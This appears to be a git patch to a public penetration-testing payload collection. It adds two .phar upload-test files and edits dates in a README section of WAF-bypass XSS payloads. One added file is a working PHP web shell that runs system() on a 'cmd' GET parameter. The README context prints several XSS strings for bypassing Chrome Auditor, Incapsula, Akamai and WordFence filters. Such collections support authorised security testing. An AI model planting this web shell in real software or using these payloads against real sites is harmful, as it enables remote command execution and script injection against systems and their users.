From 0070ac5dc4f31b332ccb0c4c75c84720e64c0100 Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Thu, 10 Jan 2019 22:36:30 +0100
Subject: [PATCH] Phar PHP shell files

---
 Upload insecure files/PHP Extension/phpinfo.phar |  1 +
 Upload insecure files/PHP Extension/shell.phar   |  1 +
 XSS injection/README.md                          | 13 +++++++------
 3 files changed, 9 insertions(+), 6 deletions(-)
 create mode 100644 Upload insecure files/PHP Extension/phpinfo.phar
 create mode 100644 Upload insecure files/PHP Extension/shell.phar

diff --git a/Upload insecure files/PHP Extension/phpinfo.phar b/Upload insecure files/PHP Extension/phpinfo.phar
new file mode 100644
index 0000000..147cebc
--- /dev/null
+++ b/Upload insecure files/PHP Extension/phpinfo.phar	
@@ -0,0 +1 @@
+<?php phpinfo(); ?>
diff --git a/Upload insecure files/PHP Extension/shell.phar b/Upload insecure files/PHP Extension/shell.phar
new file mode 100644
index 0000000..b1abb37
--- /dev/null
+++ b/Upload insecure files/PHP Extension/shell.phar	
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
\ No newline at end of file
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 9df2b3e..77a0d91 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -823,7 +823,7 @@ Works for CSP like `script-src self`
 
 ## Common WAF Bypass
 
-### Chrome Auditor - 9th august
+### Chrome Auditor - 9th august 2018
 
 ```javascript
 </script><svg><script>alert(1)-%26apos%3B
@@ -831,7 +831,7 @@ Works for CSP like `script-src self`
 
 Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
 
-### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th march
+### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th march 2018
 
 ```javascript
 anythinglr00</script><script>alert(document.domain)</script>uxldz
@@ -839,25 +839,26 @@ anythinglr00</script><script>alert(document.domain)</script>uxldz
 anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
 ```
 
-### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th september
+### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th september 2018
 
 ```javascript
 <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
 ```
 
-### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th june
+
+### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th june 2018
 
 ```javascript
 ?"></script><base%20c%3D=href%3Dhttps:\mysite>
 ```
 
-### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th october
+### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th october 2018
 
 ```html
 <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
 ```
 
-### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th september
+### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th september 2018
 
 ```javascript
 <a href=javas&#99;ript:alert(1)>